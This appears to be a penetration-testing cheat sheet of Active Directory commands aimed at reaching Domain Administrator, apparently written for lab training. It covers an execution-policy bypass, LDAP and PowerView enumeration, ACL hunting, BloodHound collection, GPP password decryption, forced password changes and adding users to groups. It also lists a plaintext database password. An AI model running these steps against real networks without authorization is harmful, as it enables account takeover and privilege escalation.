Enumeration

NOTE: Goal is to privilege escalate to Domain Administrator

Initial Access

RDP

xfreerdp3 /u:'<Username>' /d:'<Domain Name>' /p:'<Password>' /v:<Target IP Address> /dynamic-resolution +clipboard /drive:/home/kali/offsec/downloads,/shared

Enumeration

Manual

NOTE: Make sure to run the following!

powershell -ep bypass

Get users on domain

net user /domain

Get info on particular user

net user <Username> /domain

Get groups on domain

net group /domain

Get info on particular CUSTOM group

net group "<Group Name>" /domain

To enumerate users and groups

Script

New-Item "<Path/to/script.ps1>"

notepad "<Path/to/script.ps1>"

function LDAPSearch {
    param (
        [string]$LDAPQuery
    )

    $PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
    $DistinguishedName = ([adsi]'').distinguishedName

    $DirectoryEntry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$PDC/$DistinguishedName")

    $DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher($DirectoryEntry, $LDAPQuery)

    return $DirectorySearcher.FindAll()

}

Import the module into powershell

Import-Module .\function.ps1

To enumerate users

LDAPSearch -LDAPQuery "(samAccountType=805306368)"

To enumerate groups

LDAPSearch -LDAPQuery "(objectclass=group)"

To display members of each group

foreach ($group in $(LDAPSearch -LDAPQuery "(objectCategory=group)")) {$group.properties | select {$_.cn}, {$_.member}}

To display detailed members of a particular group

$group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=<Group Name>))"
$group.properties.member

To display detailed information of a particular member

$user = LDAPSearch -LDAPQuery "(&(objectCategory=user)(cn=<Username>))"
$user.properties

Powerview

Import Powerview

Import-Module C:\Tools\PowerView.ps1

Enumerate Users in the Domain

Get-NetUser

To get filtered result

Get-NetUser | select <Field Name> ...

EXAMPLE:

Get-NetUser | select cn, pwdlastset ,lastlogon

To get specific information of a particular user

Get-NetUser <Username>

Enumerate Groups in the Domain

Get-NetGroup

To get filtered result

Get-NetGroup | select <Field name> ...

EXAMPLE:

Get-NetGroup | select cn

To get specific information of a particular group

Get-NetGroup <Group Name>

Enumerate Computers in the Domain

Get-NetComputer

To get filtered result

Get-NetComputer | select <Field name> ...

EXAMPLE:

Get-NetComputer | select operatingsystem, dnshostname

To get specific information of a particular computer

Get-NetComputer <DNS Host Name>

To look for administrative rights on other computer for the current user

Find-LocalAdminAccess

To look for logged on users on target machine

Get-NetSession -ComputerName <Computer Name> -Verbose

NOTE: If something is not right check for permission.

Permissions for NetSessionEnum are defined in SrvsvcSessionInfo registry key (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity)

Alternatives

C:\Tools\PSTools\PsLoggedon.exe \\<Host Name>

NOTE: Remote machine must have Remote Registry service enabled

To check for permission

Get-Acl -Path <Registery Hive>:<Registry Path> | fl

EXAMPLE:

Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl

To enumerate Service Principal Name

Get-NetUser -SPN | select samaccountname, serviceprincipalname

To enumerate ACEs

Get-ObjectAcl -Identity "<Username | Group Name>"

NOTE: Look out for ActiveDirectoryRights and SecurityIdentifier

To enumerate interesting ACL

Find-InterestingDomainAcl | select identityreferencename,activedirectoryrights,acetype,objectdn | ?{$_.IdentityReferenceName -NotContains "DnsAdmins"} | ft

To enumerate all user that has ActiveDirectoryRights = GenericAll under a group

Get-ObjectAcl -Identity "<Group Name>" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier, ActiveDirectoryRights

To enumerate all ActiveDirectoryRights = GenericWrite under a group

Get-ObjectAcl -Identity "<Group Name>" | ?{$_.ActiveDirectoryRights -eq "GenericWrite"} | select SecurityIdentifier, ActiveDirectoryRights

To convert SID to Name in bulk

"<SID>", "<SID>", "<SID>", "<SID>", "<SID>" | Convert-SidToName

To convert SID to Name individually

Convert-SidToName "<SID>"

Add user into group in domain

net group "<Group Name>" <Username> /add /domain

To enumerate all shares on Domain

Find-DomainShare

To enumerate shares available to current user

Find-DomainShare -CheckShareAccess

To list the content in directory

ls \\<Computer Name>\<Share Name>

To crack hashed password changed in AD

gpp-decrypt '<Hashed Password>'

NOTE: The above command is to be executed on Kali Machine

BloodHound

To import BloodHound

Import-Module C:\Tools\Bloodhound.ps1

To begin enumerationg on BloodHound

Invoke-BloodHound -CollectionMethod All -OutputDirectory <Path> -OutputPrefix "corp audit"

On kali:

sudo neo4j start

NOTE: Head over to http://localhost:7474

Username: neo4j

Password: arctic-iris-zipper-prism-courage-7161

Additional Things

Change password (Must have permission on the user)

net user <Username> <New Password> /domain

runas /user:<Domain Name>\<Username> cmd.exe

Add user to group (Must have permission on the group)

net group "<Group Name>" <Username> /add /domain